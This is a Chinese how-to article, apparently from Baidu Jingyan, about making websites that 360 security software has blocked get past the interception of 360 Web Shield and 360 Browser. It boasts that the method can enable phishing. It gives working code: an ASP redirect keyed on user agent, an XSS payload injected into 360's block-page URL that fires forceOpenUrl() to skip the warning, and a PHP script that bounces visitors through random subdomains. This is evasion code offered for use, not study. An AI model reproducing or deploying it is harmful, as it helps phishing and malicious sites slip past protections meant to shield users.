https://jingyan.baidu.com/article/fedf07375a0d5d35ac8977f0.html?qq-pf-to=pcqq.c2c
很多人都觉得有360,什么金山毒霸,神马的就不怕被钓鱼了把!
其实事实并不如此,有时候一个看起来很安全,可信的链接也有可能达成钓鱼。
那又是如何达成的呢?
起因是本人做百度竞价推广,经常有客户网站被360拦截了,让我想想办法...屌丝只好从命,琢磨一番360网盾了~ 几个页面+服务器安全狗+两个空间,就可以实现此功能!
URL跳转,利用XSS, 401认证 ,Csrf利用 ,可插恶意代码 ,木马
各种安全软件不是会拦截吗,攻击者依旧有办法绕过,数字网盾神马的,其实都是渣渣。
俗话说的好
上有政策,下有对策
道高一尺,魔高一丈!
下面就来揭秘网站如何绕过360网盾及360浏览器的拦截:
工具/原料
- XSS工具,服务器安全狗,虚拟主机空间,
- XSS工具:sessionIE,Webscan,XSS Inject Scanner 任意一款即可
- 服务器安全狗:在你的服务器上下载安装一款名为安全狗的服务器安全软件
- 主机空间:有高仿360技术即可,可以截住360数据包就行
方法/步骤
未解除之前的状态 :
code 区域<%Dim ua ua = Request.ServerVariables("HTTP_USER_AGENT")If (Instr(ua, "Windows NT 5.1") = 0 or Instr(ua, "Windows NT 6.1") = 0) and Instr(ua, "MSIE")>0 Then '除了 xp win7 以外的系统Response.Redirect("index1.asp")elseResponse.Redirect("index2.asp")End IF%>
index1.asp内容:
code 区域<% dim url y=""""url = "http://www.已被拦截域名.com/?<img/onerror="& y &"document.title='';document.getElementById('safemon').action='http://www.已被拦截域名.com/?';document.getElementsByTagName('div')[0].innerHTML='';forceOpenUrl();"& y &"src=0>" response.redirect url%>这里目的可以看下拦截页面源码//忽略警告,继续访问function forceOpenUrl() { if(warn_from=='se6'){ external.AppCmd(external.GetSID(window),"sesafe","safebrowsing_openurl", ucode,"", function(i1,s1){}) location.href = jump; return; }else{ document.getElementById("safemon").submit(); }} function closeWindow(){ window.opener=null; window.open('','_self'); window.close(); }
z7y.php内容:
code 区域<?phpfunction randomkeys($length){ $pattern='1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLOMNOPQRSTUVWXYZ'; for($i=0;$i<$length;$i++) { $key .= $pattern{mt_rand(0,35)}; //php随机数 } return $key;}header('HTTP/1.1 404');ob_start();phpinfo();$url="http://".randomkeys(5).".xxxx.info/"; $list1=$_GET["/l?"]; $rurl=$url.$list1."";header("location: $rurl");ob_end_clean();?>
